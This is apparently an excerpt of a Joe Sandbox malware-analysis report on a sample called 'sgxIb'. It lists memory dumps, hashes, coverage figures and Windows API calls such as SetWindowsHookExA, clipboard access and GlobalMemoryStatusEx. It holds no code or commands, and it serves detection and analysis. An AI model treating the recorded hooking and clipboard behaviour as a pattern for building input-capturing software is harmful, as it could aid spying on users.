                                        • API String ID:
                                        • Opcode ID: 0830e88f6e910df7858afc4c9c82673908195ac2c7f8bb0fcf08eeddd7420e50
                                        • Instruction ID: edf4d79ee8153987b2cf9a4a238a12dfad871e6b6d2ff136aae7b4ec9a27ba0d
                                        • Opcode Fuzzy Hash: 0830e88f6e910df7858afc4c9c82673908195ac2c7f8bb0fcf08eeddd7420e50
                                        • Instruction Fuzzy Hash: 60F0C2710043849FE7108E1ACCC4BA2FFE8EB91338F18C45AED080E282C279A840CA70

                                        Execution Graph

                                        Execution Coverage:12.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:194
                                        Total number of Limit Nodes:25
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4195241370.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71b0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55ec273c7a52c02d8105db08300178169bba36419def3be9763e5b9b2f7d41cc
                                        • Instruction ID: 66106be9c3fdfa097d754ac709c7a84c4ada437d0428eb79fa604526fb73b69d
                                        • Opcode Fuzzy Hash: 55ec273c7a52c02d8105db08300178169bba36419def3be9763e5b9b2f7d41cc
                                        • Instruction Fuzzy Hash: 1462AE74B002059FDB25DB68D584AADB7F2FF89314F148469E809EB390DB35ED86CB90

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq$(bq$(bq
                                        • API String ID: 0-2716923250
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 071A5DAA
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 071A5DAA
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 071A4C56
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 071AAAE9
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 071A9C1F
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 071A9C1F
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,071AAD35), ref: 071AADBF
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 071AD32B
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 071AD32B
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 032CEEBF
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4162490899.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_32c0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 071A4C56
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 071A4C56
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 071AB67D
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 071AB67D
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,071AAD35), ref: 071AADBF
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,071AAD35), ref: 071AADBF
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 071AB67D
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 2624f7690b16cac2e4cf27f9df80aaff57c0b591dfea30d750c3857c990ccfe7
                                        • Instruction ID: 67c35f1d7ba35286a8375bb07ac1cc7b51c99005060393d1a38731e035c3ae49
                                        • Opcode Fuzzy Hash: 2624f7690b16cac2e4cf27f9df80aaff57c0b591dfea30d750c3857c990ccfe7
                                        • Instruction Fuzzy Hash: 3B1130B58043489FCB20DF9AD588BDEBBF8EB48320F208419D518A7250D374A940CFA8
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4195241370.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71b0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9c91334cda6d33473c35e1e4b763204cbd3cddbe828b829d09c2d532a0d2dd8
                                        • Instruction ID: ab737dc7cf456fe4294426b645c420753ed2408f3b689784899645d360d002c8
                                        • Opcode Fuzzy Hash: d9c91334cda6d33473c35e1e4b763204cbd3cddbe828b829d09c2d532a0d2dd8
                                        • Instruction Fuzzy Hash: AD61C4B1F001124FCB259A7EC8845AFBAD7AFD5620B25443AD80EDB364DF65ED0287D2
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b18b8260277487e71113213d060f75a889db5b75d9ee87a2e85430f3c26eb965
                                        • Instruction ID: 4f9b1b1a24550e46142116e0f7ac8efa138e66fd9c04aed78a3d51e18010b0e9
                                        • Opcode Fuzzy Hash: b18b8260277487e71113213d060f75a889db5b75d9ee87a2e85430f3c26eb965
                                        • Instruction Fuzzy Hash: E5417030D207099FCB14DFA9C85469DFBB1FF88300F14C659D545BB254EB71AA85CB91
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4158167785.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_177d000_sgxIb.jbxd
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4195241370.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71b0000_sgxIb.jbxd
                                        • Instruction ID: 371a63c68461f18373d4de3538a3dcffc76b26d55640ad2d8158bf9e62a500b7
                                        • Opcode Fuzzy Hash: 30a303dd466e1d60cb691fd0f0b68446006a3ce5fa136262088e545e4229ed44
                                        • Instruction Fuzzy Hash: 4BC012B04006008EDF18DF54C4482207AA0AB08328B30028CD16A0A2D2C332C183CBD0